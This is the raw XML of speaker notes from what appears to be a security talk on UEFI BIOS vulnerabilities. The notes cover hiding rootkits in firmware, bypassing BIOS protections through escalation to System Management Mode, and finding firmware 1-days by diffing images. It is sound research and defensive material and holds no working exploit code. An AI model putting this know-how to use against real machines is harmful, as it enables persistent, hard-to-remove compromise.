          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669" name="Shape 66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Shape 298"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>UEFI BIOS security and possible rootkit injection has become a red-hot topic. It was well-covered by Alex Matrsov a few times. To gain maximum capabilities on a target platform, to achieve stealth and be hard to remove the rootkit should be placed as deeper to hardware as can be. Inside the firmware, the UEFI BIOS seems to be a nice target to hide an implant.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Shape 30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4" name="Shape 674"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675" name="Shape 675"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Considering CRC-32 hash saving, we can modify the pointer like this</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Shape 676"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="677" name="Shape 67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2" name="Shape 682"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Shape 683"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Shape 684"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685" name="Shape 68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1" name="Shape 691"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="Shape 692"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Shape 693"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Shape 69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0" name="Shape 700"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="Shape 701"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>So here are some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>takeways</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>1) There are still highly critical vulnerabilities in UEFI BIOS firmware allowing a LPE to SMM </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>2) The talk described the modern way to discover such vulnerabilities in system firmware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>3) 1-days in firmware could be easily discovered by diffing the firmware images, and the findings will be relevant for many systems </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Shape 702"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Shape 70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9" name="Shape 709"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="710" name="Shape 710"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Thank you for your attention!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-216000" lvl="0" marL="216000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Shape 711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712" name="Shape 71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Shape 308"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>So there are a few technologies made to protect BIOS from illegal modification.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>The list starts from a simple and almost unused write-protect jumper for SPI flash memory, then there are architectural protections like Protected-Range registers, SMM-based protection or the powerful Intel BIOS Guard which is disabled by default anywhere.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Additionally, the system can be configured to the verified boot mode with Root-of-Trust locked in hardware like Intel Boot Guard suggests. If it detects any illegal modification of the following BIOS boot component, it can shut the system down immediately to prevent the execution of injected code. That’s why it sometimes called as “UEFI rootkits killer”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Shape 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Shape 31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Shape 318"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>However, it’s up to BIOS and system vendor to decide the list of applied protection technologies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Some vendors are not using them at all. You can check the applied protection on your system with CHIPSEC framework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>But even if you see that vendor of your system had applied some protections, there’s no guarantee that they are implemented properly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Most of protections could be bypassed if an attacker finds the vulnerability in BIOS code, that allows to escalate privileges from kernel to system management mode.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Shape 319"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Shape 32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Shape 329"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>So let’s talk about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> System Management Mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>in x86.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Shape 330"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Shape 33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Shape 336"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
